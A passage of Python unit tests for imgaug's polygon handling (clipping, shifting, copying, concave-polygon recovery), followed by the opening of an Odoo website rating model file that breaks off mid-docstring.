        poly_oi_clip = poly_oi.clip_out_of_image()
        assert len(poly_oi_clip.polygons) == 0
        assert poly_oi_clip.shape == (10, 11, 3)

        # one polygon, fully inside -> unchanged
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)])],
            shape=(10, 11, 3))
        poly_oi_clip = poly_oi.clip_out_of_image()
        assert len(poly_oi_clip.polygons) == 1
        for point_search in [(1, 1), (8, 1), (8, 9), (1, 9)]:
            assert _any_point_close(poly_oi_clip.polygons[0].exterior,
                                    point_search)
        assert poly_oi_clip.shape == (10, 11, 3)

        # one polygon, partially outside -> clipped to image width (11)
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (15, 1), (15, 9), (1, 9)])],
            shape=(10, 11, 3))
        poly_oi_clip = poly_oi.clip_out_of_image()
        assert len(poly_oi_clip.polygons) == 1
        for point_search in [(1, 1), (11, 1), (11, 9), (1, 9)]:
            assert _any_point_close(poly_oi_clip.polygons[0].exterior,
                                    point_search)
        assert poly_oi_clip.shape == (10, 11, 3)

        # one polygon, fully outside -> removed entirely
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(100, 100), (200, 100), (200, 200), (100, 200)])],
            shape=(10, 11, 3))
        poly_oi_clip = poly_oi.clip_out_of_image()
        assert len(poly_oi_clip.polygons) == 0
        assert poly_oi_clip.shape == (10, 11, 3)

        # three polygons, one fully inside, one partially outside,
        # one fully outside
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
             ia.Polygon([(1, 1), (15, 1), (15, 9), (1, 9)]),
             ia.Polygon([(100, 100), (200, 100), (200, 200), (100, 200)])],
            shape=(10, 11, 3))
        poly_oi_clip = poly_oi.clip_out_of_image()
        assert len(poly_oi_clip.polygons) == 2
        for point_search in [(1, 1), (8, 1), (8, 9), (1, 9)]:
            assert _any_point_close(poly_oi_clip.polygons[0].exterior,
                                    point_search)
        for point_search in [(1, 1), (11, 1), (11, 9), (1, 9)]:
            assert _any_point_close(poly_oi_clip.polygons[1].exterior,
                                    point_search)
        assert poly_oi_clip.shape == (10, 11, 3)

    def test_shift(self):
        # no polygons
        poly_oi = ia.PolygonsOnImage([], shape=(10, 11, 3))
        poly_oi_shifted = poly_oi.shift(top=3, right=0, bottom=1, left=-3)
        assert len(poly_oi_shifted.polygons) == 0
        assert poly_oi_shifted.shape == (10, 11, 3)

        # three polygons
        # top=3, bottom=1 -> y shifted by +2; left=-3, right=0 -> x by -3
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
             ia.Polygon([(1, 1), (15, 1), (15, 9), (1, 9)]),
             ia.Polygon([(100, 100), (200, 100), (200, 200), (100, 200)])],
            shape=(10, 11, 3))
        poly_oi_shifted = poly_oi.shift(top=3, right=0, bottom=1, left=-3)
        assert len(poly_oi_shifted.polygons) == 3
        assert np.allclose(poly_oi_shifted.polygons[0].exterior,
                           [(1-3, 1+2), (8-3, 1+2), (8-3, 9+2), (1-3, 9+2)],
                           rtol=0, atol=1e-4)
        assert np.allclose(poly_oi_shifted.polygons[1].exterior,
                           [(1-3, 1+2), (15-3, 1+2), (15-3, 9+2), (1-3, 9+2)],
                           rtol=0, atol=1e-4)
        assert np.allclose(poly_oi_shifted.polygons[2].exterior,
                           [(100-3, 100+2), (200-3, 100+2),
                            (200-3, 200+2), (100-3, 200+2)],
                           rtol=0, atol=1e-4)
        assert poly_oi_shifted.shape == (10, 11, 3)

    def test_copy(self):
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
             ia.Polygon([(2, 2), (16, 2), (16, 10), (2, 10)])],
            shape=(10, 11, 3))
        poly_oi_copy = poly_oi.copy()
        assert len(poly_oi_copy.polygons) == 2
        assert np.allclose(poly_oi_copy.polygons[0].exterior,
                           [(1, 1), (8, 1), (8, 9), (1, 9)],
                           rtol=0, atol=1e-4)
        assert np.allclose(poly_oi_copy.polygons[1].exterior,
                           [(2, 2), (16, 2), (16, 10), (2, 10)],
                           rtol=0, atol=1e-4)

        # rebinding the polygons attribute of the copy must not affect
        # the original
        poly_oi_copy.polygons = [ia.Polygon([(0, 0), (1, 0), (1, 1)])]
        assert np.allclose(poly_oi.polygons[0].exterior,
                           [(1, 1), (8, 1), (8, 9), (1, 9)],
                           rtol=0, atol=1e-4)
        assert np.allclose(poly_oi_copy.polygons[0].exterior,
                           [(0, 0), (1, 0), (1, 1)],
                           rtol=0, atol=1e-4)

        # same for the shape attribute
        poly_oi_copy.shape = (20, 30, 3)
        assert poly_oi.shape == (10, 11, 3)
        assert poly_oi_copy.shape == (20, 30, 3)

    def test_deepcopy(self):
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
             ia.Polygon([(2, 2), (16, 2), (16, 10), (2, 10)])],
            shape=(10, 11, 3))
        poly_oi_copy = poly_oi.deepcopy()
        assert len(poly_oi_copy.polygons) == 2
        assert np.allclose(poly_oi_copy.polygons[0].exterior,
                           [(1, 1), (8, 1), (8, 9), (1, 9)],
                           rtol=0, atol=1e-4)
        assert np.allclose(poly_oi_copy.polygons[1].exterior,
                           [(2, 2), (16, 2), (16, 10), (2, 10)],
                           rtol=0, atol=1e-4)

        # replacing a polygon in the copy must not affect the original
        poly_oi_copy.polygons[0] = ia.Polygon([(0, 0), (1, 0), (1, 1)])
        assert np.allclose(poly_oi.polygons[0].exterior,
                           [(1, 1), (8, 1), (8, 9), (1, 9)],
                           rtol=0, atol=1e-4)
        assert np.allclose(poly_oi_copy.polygons[0].exterior,
                           [(0, 0), (1, 0), (1, 1)],
                           rtol=0, atol=1e-4)

        # in-place mutation of a copied polygon's exterior must not affect
        # the original either (deep copy down to the coordinate arrays)
        poly_oi_copy.polygons[1].exterior[0][0] = 100
        assert np.allclose(poly_oi.polygons[1].exterior,
                           [(2, 2), (16, 2), (16, 10), (2, 10)],
                           rtol=0, atol=1e-4)
        assert np.allclose(poly_oi_copy.polygons[1].exterior,
                           [(100, 2), (16, 2), (16, 10), (2, 10)],
                           rtol=0, atol=1e-4)

        poly_oi_copy.shape = (20, 30, 3)
        assert poly_oi.shape == (10, 11, 3)
        assert poly_oi_copy.shape == (20, 30, 3)

    def test__repr__(self):
        poly_oi = ia.PolygonsOnImage([], shape=(10, 11, 3))
        assert poly_oi.__repr__() == "PolygonsOnImage([], shape=(10, 11, 3))"

        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
             ia.Polygon([(2, 2), (16, 2), (16, 10), (2, 10)])],
            shape=(10, 11, 3))
        assert poly_oi.__repr__() == (
            "PolygonsOnImage(["
            + "Polygon([(x=1.000, y=1.000), (x=8.000, y=1.000), "
            + "(x=8.000, y=9.000), (x=1.000, y=9.000)] "
            + "(4 points), label=None), "
            + "Polygon([(x=2.000, y=2.000), (x=16.000, y=2.000), "
            + "(x=16.000, y=10.000), (x=2.000, y=10.000)] "
            + "(4 points), label=None)"
            + "], shape=(10, 11, 3))")

    def test__str__(self):
        # __str__ is expected to produce the same string as __repr__;
        # previously this test mistakenly called __repr__ and therefore
        # never exercised __str__ at all.
        poly_oi = ia.PolygonsOnImage([], shape=(10, 11, 3))
        assert poly_oi.__str__() == "PolygonsOnImage([], shape=(10, 11, 3))"

        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
             ia.Polygon([(2, 2), (16, 2), (16, 10), (2, 10)])],
            shape=(10, 11, 3))
        assert poly_oi.__str__() == (
            "PolygonsOnImage(["
            + "Polygon([(x=1.000, y=1.000), (x=8.000, y=1.000), "
            + "(x=8.000, y=9.000), (x=1.000, y=9.000)] "
            + "(4 points), label=None), "
            + "Polygon([(x=2.000, y=2.000), (x=16.000, y=2.000), "
            + "(x=16.000, y=10.000), (x=2.000, y=10.000)] "
            + "(4 points), label=None)"
            + "], shape=(10, 11, 3))")
class Test_ConcavePolygonRecoverer(unittest.TestCase):
def setUp(self):
reseed()
@classmethod
def _assert_points_are_identical(cls, observed, expected, atol=1e-8, rtol=0):
assert len(observed) == len(expected)
for i, (ps_obs, ps_exp) in enumerate(zip(observed, expected)):
assert len(ps_obs) == len(ps_exp), "Failed at point %d" % (i,)
for p_obs, p_exp in zip(ps_obs, ps_exp):
assert len(p_obs) == 2
assert len(p_exp) == 2
assert np.allclose(p_obs, p_exp, atol=atol, rtol=rtol), "Unexpected coords at %d" % (i,)
def test_recover_from_fails_for_less_than_three_points(self):
old_polygon = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
cpr = _ConcavePolygonRecoverer()
with self.assertRaises(AssertionError):
_poly = cpr.recover_from([], old_polygon)
with self.assertRaises(AssertionError):
_poly = cpr.recover_from([(0, 0)], old_polygon)
with self.assertRaises(AssertionError):
_poly = cpr.recover_from([(0, 0), (1, 0)], old_polygon)
_poly = cpr.recover_from([(0, 0), (1, 0), (1, 1)], old_polygon)
def test_recover_from_predefined_polygons(self):
cpr = _ConcavePolygonRecoverer()
# concave input
polys = [
[(0, 0), (1, 0), (1, 1)],
[(0, 0), (1, 0), (1, 1), (0, 1)],
[(0, 0), (0.5, 0), (1, 0), (1, 0.5), (1, 1), (0.5, 1.0), (0, 1)],
]
for poly in polys:
old_polygon = ia.Polygon(poly)
poly_concave = cpr.recover_from(poly, old_polygon)
assert poly_concave.is_valid
found = [False] * len(poly)
for i, point in enumerate(poly):
for point_ext in poly_concave.exterior:
dist = np.sqrt(
(point[0] - point_ext[0])**2
+ (point[1] - point_ext[1])**2
)
if dist < 0.01:
found[i] = True
assert all(found)
# line
poly = [(0, 0), (1, 0), (2, 0)]
old_polygon = ia.Polygon(poly)
poly_concave = cpr.recover_from(poly, old_polygon)
assert poly_concave.is_valid
found = [False] * len(poly)
for i, point in enumerate(poly):
for point_ext in poly_concave.exterior:
dist = np.sqrt(
(point[0] - point_ext[0])**2
+ (point[1] - point_ext[1])**2
)
if dist < 0.025:
found[i] = True
assert all(found)
# duplicate points
poly = [(0, 0), (1, 0), (1, 0), (1, 1)]
old_polygon = ia.Polygon(poly)
poly_concave = cpr.recover_from(poly, old_polygon)
assert poly_concave.is_valid
found = [False] * len(poly)
for i, point in enumerate(poly):
for point_ext in poly_concave.exterior:
dist = np.sqrt(
(point[0] - point_ext[0])**2
+ (point[1] - point_ext[1])**2
)
if dist < 0.01:
found[i] = True
assert all(found)
# other broken poly
poly = [(0, 0), (0.5, 0), (0.5, 1.2), (1, 0), (1, 1), (0, 1)]
old_polygon = ia.Polygon(poly)
poly_concave = cpr.recover_from(poly, old_polygon)
assert poly_concave.is_valid
found = [False] * len(poly)
for i, point in enumerate(poly):
for point_ext in poly_concave.exterior:
dist = np.sqrt(
(point[0] - point_ext[0])**2
+ (point[1] - point_ext[1])**2
)
if dist < 0.025:
found[i] = True
assert all(found)
def test_recover_from_random_polygons(self):
cpr = _ConcavePolygonRecoverer()
nb_iterations = 10
height, width = 10, 20
nb_points_matrix = np.random.randint(3, 30, size=(nb_iterations,))
for nb_points in nb_points_matrix:
points = np.random.random(size=(nb_points, 2))
points[:, 0] *= width
points[:, 1] *= height
# currently mainly used to copy the label, so not a significant
# issue that it is not concave
old_polygon = ia.Polygon(points)
poly_concave = cpr.recover_from(points, old_polygon)
assert poly_concave.is_valid
# test if all points are in BB around returned polygon
# would be better to directly call a polygon.contains(point) method
# but that does not yet exist
xx = poly_concave.exterior[:, 0]
yy = poly_concave.exterior[:, 1]
bb_x1, bb_x2 = min(xx), max(xx)
bb_y1, bb_y2 = min(yy), max(yy)
bb = ia.BoundingBox(x1=bb_x1-1e-4, y1=bb_y1-1e-4, x2=bb_x2+1e-4, y2=bb_y2+1e-4)
for point in points:
assert bb.contains(ia.Keypoint(x=point[0], y=point[1]))
def test__remove_consecutive_duplicate_points(self):
recoverer = _ConcavePolygonRecoverer()
points = [(0, 0), (1, 1)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
points
)
points = [(0.0, 0.5), (1.0, 1.0)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
np.float32(points)
)
points = np.float32([(0.0, 0.5), (1.0, 1.0)])
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
np.float32(points)
)
points = [(0, 0), (0, 0)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
[(0, 0)],
atol=1e-8, rtol=0
)
points = [(0, 0), (0, 0), (1, 0)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
[(0, 0), (1, 0)],
atol=1e-8, rtol=0
)
points = [(0, 0), (1, 0), (1, 0)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
[(0, 0), (1, 0)],
atol=1e-8, rtol=0
)
points = [(0, 0), (1, 0), (1, 0), (2, 0), (0, 0)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
[(0, 0), (1, 0), (2, 0)],
atol=1e-8, rtol=0
)
    def test__jitter_duplicate_points(self):
        """Test _jitter_duplicate_points(): points closer than the duplicate
        threshold to an earlier point must be jittered away, while all other
        points must stay (nearly) unchanged."""
        cpr = _ConcavePolygonRecoverer(threshold_duplicate_points=1e-4)
        # no duplicates -> all points unchanged
        points = [(0, 0), (1, 0), (1, 1), (0, 1)]
        points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
        assert np.allclose(points, points_jittered, rtol=0, atol=1e-4)
        points = [(0, 0), (1, 0), (0, 1)]
        points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
        assert np.allclose(points, points_jittered, rtol=0, atol=1e-4)
        # closely spaced but distinct points (spacing above threshold)
        # -> still unchanged
        points = [(0, 0), (0.01, 0), (0.01, 0.01), (0, 0.01)]
        points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
        assert np.allclose(points, points_jittered, rtol=0, atol=1e-4)
        # single duplicate (index 2, within 1e-6 of index 1)
        # -> only that point is jittered by at least the threshold
        points = [(0, 0), (1, 0), (1 + 1e-6, 0), (1, 1), (0, 1)]
        points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
        assert np.allclose(
            [point for i, point in enumerate(points_jittered) if i in [0, 1, 3, 4]],
            [(0, 0), (1, 0), (1, 1), (0, 1)],
            rtol=0,
            atol=1e-5
        )
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[2])) >= 1e-4
        # same duplicate at a different position in the list
        points = [(0, 0), (1, 0), (1, 1), (1 + 1e-6, 0), (0, 1)]
        points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
        assert np.allclose(
            [point for i, point in enumerate(points_jittered) if i in [0, 1, 2, 4]],
            [(0, 0), (1, 0), (1, 1), (0, 1)],
            rtol=0,
            atol=1e-5
        )
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[3])) >= 1e-4
        # duplicate as the last point
        points = [(0, 0), (1, 0), (1, 1), (0, 1), (1 + 1e-6, 0)]
        points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
        assert np.allclose(
            [point for i, point in enumerate(points_jittered) if i in [0, 1, 2, 3]],
            [(0, 0), (1, 0), (1, 1), (0, 1)],
            rtol=0,
            atol=1e-5
        )
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[4])) >= 1e-4
        # many duplicates of the same point (indices 2, 4, 6, 7, 8)
        # -> every duplicate is jittered away
        points = [(0, 0), (1, 0), (1 + 1e-6, 0), (1, 1), (1 + 1e-6, 0), (0, 1),
                  (1 + 1e-6, 0), (1 + 1e-6, 0 + 1e-6), (1 + 1e-6, 0 + 2e-6)]
        points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
        assert np.allclose(
            [point for i, point in enumerate(points_jittered) if i in [0, 1, 3, 5]],
            [(0, 0), (1, 0), (1, 1), (0, 1)],
            rtol=0,
            atol=1e-5
        )
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[2])) >= 1e-4
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[4])) >= 1e-4
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[6])) >= 1e-4
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[7])) >= 1e-4
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[8])) >= 1e-4
        # duplicates of two different points ((0, 0) at index 2 and (1, 0)
        # at indices 3, 5, 7, 8, 9)
        points = [(0, 0), (1, 0), (0 + 1e-6, 0 - 1e-6), (1 + 1e-6, 0), (1, 1),
                  (1 + 1e-6, 0), (0, 1), (1 + 1e-6, 0), (1 + 1e-6, 0 + 1e-6),
                  (1 + 1e-6, 0 + 2e-6)]
        points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
        assert np.allclose(
            [point for i, point in enumerate(points_jittered) if i in [0, 1, 4, 6]],
            [(0, 0), (1, 0), (1, 1), (0, 1)],
            rtol=0,
            atol=1e-5
        )
        assert np.linalg.norm(np.float32([0, 0]) - np.float32(points_jittered[2])) >= 1e-4
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[3])) >= 1e-4
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[5])) >= 1e-4
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[7])) >= 1e-4
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[8])) >= 1e-4
        assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[9])) >= 1e-4
def test__calculate_circumference(self):
points = [(0, 0), (1, 0), (1, 1), (0, 1)]
circ = _ConcavePolygonRecoverer._calculate_circumference(points)
assert np.allclose(circ, 4)
points = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
circ = _ConcavePolygonRecoverer._calculate_circumference(points)
assert np.allclose(circ, 4)
points = np.float32([(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)])
circ = _ConcavePolygonRecoverer._calculate_circumference(points)
assert np.allclose(circ, 4)
points = [(0, 0), (1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0)]
circ = _ConcavePolygonRecoverer._calculate_circumference(points)
assert np.allclose(circ, 6)
def test__fit_best_valid_polygon(self):
    """_fit_best_valid_polygon() returns point indices forming a valid polygon."""

    def _assert_ids_match(observed, expected):
        # Compare the two id sequences as *cyclic* lists: they match if some
        # rotation of `observed` equals `expected`.
        assert len(observed) == len(expected), "len mismatch: %d vs %d" % (len(observed), len(expected))
        max_count = 0
        for i in range(len(observed)):
            counter = 0
            for j in range(i, i+len(expected)):
                if observed[(i+j) % len(observed)] == expected[j % len(expected)]:
                    counter += 1
                else:
                    break
            max_count = max(max_count, counter)
        assert max_count == len(expected), "count mismatch: %d vs %d" % (max_count, len(expected))

    cpr = _ConcavePolygonRecoverer()

    # An already-valid square must keep its original point order.
    points = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
    points_fit = cpr._fit_best_valid_polygon(points, random_state=np.random.RandomState(0))
    # doing this without the list(.) wrappers fails on python2.7
    assert list(points_fit) == list(sm.xrange(len(points)))

    # square-like, but top line has one point in its center which's
    # y-coordinate is below the bottom line
    points = [(0.0, 0.0), (0.45, 0.0), (0.5, 1.5), (0.55, 0.0), (1.0, 0.0),
              (1.0, 1.0), (0.0, 1.0)]
    points_fit = cpr._fit_best_valid_polygon(points, random_state=np.random.RandomState(0))
    _assert_ids_match(points_fit, [0, 1, 3, 4, 5, 2, 6])
    assert ia.Polygon([points[idx] for idx in points_fit]).is_valid

    # |--|  |--|
    # |  |  |  |
    # |  |  |  |
    # |--|--|--|
    # |        |
    #  --------
    # the intersection points on the bottom line are not provided,
    # hence the result is expected to have triangles at the bottom left
    # and right
    points = [(0.0, 0), (0.25, 0), (0.25, 1.25),
              (0.75, 1.25), (0.75, 0), (1.0, 0),
              (1.0, 1.0), (0.0, 1.0)]
    points_fit = cpr._fit_best_valid_polygon(points, random_state=np.random.RandomState(0))
    _assert_ids_match(points_fit, [0, 1, 4, 5, 6, 3, 2, 7])
    poly_observed = ia.Polygon([points[idx] for idx in points_fit])
    assert poly_observed.is_valid

    # same as above, but intersection points at the bottom line are provided
    # without oversampling, i.e. incorporating these points would lead to an
    # invalid polygon
    points = [(0.0, 0), (0.25, 0), (0.25, 1.0), (0.25, 1.25),
              (0.75, 1.25), (0.75, 1.0), (0.75, 0), (1.0, 0),
              (1.0, 1.0), (0.0, 1.0)]
    points_fit = cpr._fit_best_valid_polygon(points, random_state=np.random.RandomState(0))
    assert len(points_fit) >= len(points) - 2  # TODO add IoU check here
    poly_observed = ia.Polygon([points[idx] for idx in points_fit])
    assert poly_observed.is_valid
def test__fix_polygon_is_line(self):
    """_fix_polygon_is_line() jitters degenerate (collinear) point sets."""
    cpr = _ConcavePolygonRecoverer()

    # A proper, non-degenerate polygon must pass through unchanged.
    triangle = [(0, 0), (1, 0), (1, 1)]
    fixed = cpr._fix_polygon_is_line(triangle, np.random.RandomState(0))
    assert np.allclose(fixed, triangle, atol=0, rtol=0)

    # Line-like point sets must be altered -- but only slightly -- and must
    # no longer be classified as lines afterwards.
    collinear_sets = [
        [(0, 0), (1, 0), (2, 0)],  # horizontal
        [(0, 0), (0, 1), (0, 2)],  # vertical
        [(0, 0), (1, 1), (2, 2)],  # diagonal
    ]
    for degenerate in collinear_sets:
        fixed = cpr._fix_polygon_is_line(degenerate, np.random.RandomState(0))
        assert not np.allclose(fixed, degenerate, atol=0, rtol=0)
        assert not cpr._is_polygon_line(fixed)
        assert np.allclose(fixed, degenerate, rtol=0, atol=1e-2)
def test__is_polygon_line(self):
    """_is_polygon_line() detects point sets that span no area."""
    # Point sets that form a real polygon (non-zero area).
    not_lines = [
        [(0, 0), (1, 0), (1, 1)],
        [(0, 0), (1, 0), (1, 1), (0, 1)],
        [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)],
        np.float32([(0, 0), (1, 0), (1, 1), (0, 1)]),
        [(0, 0), (1, 0), (1, 0), (2, 0), (1, 1)],
    ]
    # Point sets that collapse onto a single line (duplicates included).
    lines = [
        [(0, 0), (1, 0)],
        [(0, 0), (1, 0), (2, 0)],
        [(0, 0), (1, 0), (1, 0)],
        [(0, 0), (1, 0), (1, 0), (2, 0)],
        [(0, 0), (1, 0), (1, 0), (2, 0), (0.5, 0)],
    ]
    for points in not_lines:
        assert not _ConcavePolygonRecoverer._is_polygon_line(points)
    for points in lines:
        assert _ConcavePolygonRecoverer._is_polygon_line(points)
def test__generate_intersection_points(self):
    """_generate_intersection_points() returns, per polygon segment, the
    points at which that segment intersects other segments (empty lists for
    polygons without self-intersections)."""
    cpr = _ConcavePolygonRecoverer()

    # triangle
    points = [(0.5, 0), (1, 1), (0, 1)]
    points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
    assert points_inter == [[], [], []]

    # rotated square
    points = [(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)]
    points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
    assert points_inter == [[], [], [], []]

    # square
    points = [(0, 0), (1, 0), (1, 1), (0, 1)]
    points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
    assert points_inter == [[], [], [], []]

    # |--|  |--|
    # |  |__|  |
    # |        |
    # |--------|
    points = [(0.0, 0), (0.25, 0), (0.25, 0.25),
              (0.75, 0.25), (0.75, 0), (1.0, 0),
              (1.0, 1.0), (0.0, 1.0)]
    points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
    assert points_inter == [[], [], [], [], [], [], [], []]

    # same as above, but middle part goes much further down,
    # crossing the bottom line
    points = [(0.0, 0), (0.25, 0), (0.25, 1.25),
              (0.75, 1.25), (0.75, 0), (1.0, 0),
              (1.0, 1.0), (0.0, 1.0)]
    points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
    self._assert_points_are_identical(
        points_inter,
        [[], [(0.25, 1.0)], [], [(0.75, 1.0)], [], [], [(0.75, 1.0), (0.25, 1.0)], []])

    # square-like structure with intersections in top right area
    points = [(0, 0), (0.5, 0), (1.01, 0.5), (1.0, 0), (1, 1), (0, 1), (0, 0)]
    points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
    self._assert_points_are_identical(
        points_inter,
        [[], [(1.0, 0.4902)], [], [(1.0, 0.4902)], [], [], []],
        atol=1e-2)

    # same as above, but with a second intersection in bottom left
    points = [(0, 0), (0.5, 0), (1.01, 0.5), (1.0, 0), (1, 1), (-0.25, 1),
              (0, 1.25)]
    points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
    self._assert_points_are_identical(
        points_inter,
        [[], [(1.0, 0.4902)], [], [(1.0, 0.4902)], [(0, 1.0)], [], [(0, 1.0)]],
        atol=1e-2)

    # double triangle with point in center that is shared by both triangles
    # (a shared vertex is not counted as an intersection)
    points = [(0, 0), (0.5, 0.5), (1.0, 0), (1.0, 1.0), (0.5, 0.5), (0, 1.0)]
    points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
    self._assert_points_are_identical(
        points_inter,
        [[], [], [], [], [], []])
def test__oversample_intersection_points(self):
    """_oversample_intersection_points() surrounds each inserted point with
    two extra points, offset by ``oversampling`` (here 10%) of the distance
    towards the neighbouring points on the segment."""
    cpr = _ConcavePolygonRecoverer()
    cpr.oversampling = 0.1

    # Single midpoint on a unit segment: neighbours at +-10% of 0.5.
    points = [(0.0, 0.0), (1.0, 0.0)]
    segment_add_points_sorted = [[(0.5, 0.0)], []]
    points_oversampled = cpr._oversample_intersection_points(points, segment_add_points_sorted)
    self._assert_points_are_identical(
        points_oversampled,
        [[(0.45, 0.0), (0.5, 0.0), (0.55, 0.0)], []],
        atol=1e-4
    )

    # Longer segment: the offset after the point scales with the distance
    # to the (farther) segment end.
    points = [(0.0, 0.0), (2.0, 0.0)]
    segment_add_points_sorted = [[(0.5, 0.0)], []]
    points_oversampled = cpr._oversample_intersection_points(points, segment_add_points_sorted)
    self._assert_points_are_identical(
        points_oversampled,
        [[(0.45, 0.0), (0.5, 0.0), (0.65, 0.0)], []],
        atol=1e-4
    )

    # Two inserted points on the same segment: offsets are computed towards
    # the respective closest neighbours (including each other).
    points = [(0.0, 0.0), (1.0, 0.0)]
    segment_add_points_sorted = [[(0.5, 0.0), (0.6, 0.0)], []]
    points_oversampled = cpr._oversample_intersection_points(points, segment_add_points_sorted)
    self._assert_points_are_identical(
        points_oversampled,
        [[(0.45, 0.0), (0.5, 0.0), (0.51, 0.0), (0.59, 0.0), (0.6, 0.0), (0.64, 0.0)], []],
        atol=1e-4
    )

    # Multiple segments of a square, each handled independently.
    points = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
    segment_add_points_sorted = [[(0.5, 0.0)], [], [(0.8, 1.0)], [(0.0, 0.7)]]
    points_oversampled = cpr._oversample_intersection_points(points, segment_add_points_sorted)
    self._assert_points_are_identical(
        points_oversampled,
        [[(0.45, 0.0), (0.5, 0.0), (0.55, 0.0)],
         [],
         [(0.82, 1.0), (0.8, 1.0), (0.72, 1.0)],
         [(0.0, 0.73), (0.0, 0.7), (0.0, 0.63)]],
        atol=1e-4
    )
def test__insert_intersection_points(self):
    """_insert_intersection_points() splices per-segment points, in order,
    after the segment's start point."""
    points = [(0, 0), (1, 0), (2, 0)]
    # (per-segment additions, expected merged point list)
    cases = [
        ([[], [], []],
         [(0, 0), (1, 0), (2, 0)]),
        ([[(0.5, 0)], [], []],
         [(0, 0), (0.5, 0), (1, 0), (2, 0)]),
        ([[(0.5, 0), (0.75, 0)], [], []],
         [(0, 0), (0.5, 0), (0.75, 0), (1, 0), (2, 0)]),
        ([[(0.5, 0)], [(1.5, 0)], []],
         [(0, 0), (0.5, 0), (1, 0), (1.5, 0), (2, 0)]),
        ([[(0.5, 0)], [(1.5, 0)], [(2.5, 0)]],
         [(0, 0), (0.5, 0), (1, 0), (1.5, 0), (2, 0), (2.5, 0)]),
    ]
    for segments_add_point_sorted, expected in cases:
        observed = _ConcavePolygonRecoverer._insert_intersection_points(
            points, segments_add_point_sorted)
        assert observed == expected
| 38.514821 | 118 | 0.537316 |
3c5f3586c59170276008997238b98e46b8f3cba1 | 1,184 | py | Python | odoo-13.0/addons/website_rating/models/rating.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | null | null | null | odoo-13.0/addons/website_rating/models/rating.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | null | null | null | odoo-13.0/addons/website_rating/models/rating.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from odoo import fields, models, exceptions, _
class Rating(models.Model):
    """Extend ``rating.rating`` with website publication state and
    publisher-moderation (comment) metadata."""

    _inherit = 'rating.rating'

    # Add this related field to mail.message for performance reason
    website_published = fields.Boolean(related='message_id.website_published', store=True, readonly=False)

    # Adding information for comment a rating message
    publisher_comment = fields.Text("Publisher Comment")
    # Partner who wrote the comment; kept (set to NULL) if the partner is deleted.
    publisher_id = fields.Many2one('res.partner', 'Commented by',
                                   ondelete='set null', readonly=True)
    publisher_datetime = fields.Datetime("Commented on", readonly=True)

    def write(self, values):
        """Restrict publisher-comment edits to website publishers and stamp
        author/date metadata when a comment is written.

        :param values: field values to write.
        :raises exceptions.AccessError: if a user outside
